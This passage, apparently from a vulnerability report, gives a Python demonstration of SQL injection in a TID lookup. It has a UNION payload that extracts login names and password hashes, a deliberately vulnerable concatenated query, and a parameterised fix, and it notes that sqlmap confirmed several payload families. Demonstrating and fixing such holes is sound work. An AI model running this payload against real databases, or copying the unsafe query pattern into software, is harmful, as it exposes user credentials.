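UNION_PAYLOAD = "3180010017 UNION ALL SELECT NULL, LoginName, PasswordHash FROM Users--"


def lookup_unsafe(conn, tid):
    """The bug: TID arrives as a string and is concatenated into the statement."""
    sql = "SELECT TID, Name, Owner FROM WorkRoom WHERE TID = " + tid
    return conn.execute(sql).fetchall()


TID_RE = re.compile(r"^\d{1,18}$")   # the 'filter' the report asks for: digits only


def lookup_safe(conn, tid):
    """The fix: validate the shape, then bind the value as a parameter."""
    if not TID_RE.match(tid):
        raise ValueError("TID must be a decimal integer")
    sql = "SELECT TID, Name, Owner FROM WorkRoom WHERE TID = ?"
    return conn.execute(sql, (int(tid),)).fetchall()


def is_rejected(conn, tid):
    """True if the fixed lookup refuses this TID value."""
    try:
        lookup_safe(conn, tid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_demo_db()
    print("unsafe :", lookup_unsafe(db, UNION_PAYLOAD))   # second row comes from Users
    print("safe   :", lookup_safe(db, "3180010017"))
    print("payload rejected by safe lookup:", is_rejected(db, UNION_PAYLOAD))
```

In the application's own ASP.NET/ADO.NET stack the equivalent of the `?` placeholder is a SqlParameter added to the SqlCommand; with the value bound as an integer, none of the four payload families sqlmap confirmed can reach the parser, and the digits-only check in front of it turns the attempts into ordinary 400s instead of the 500s seen above.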
Severity: High
Vulnerability Rank: 16
Confirmed: 2014-08-17 13:06
None yet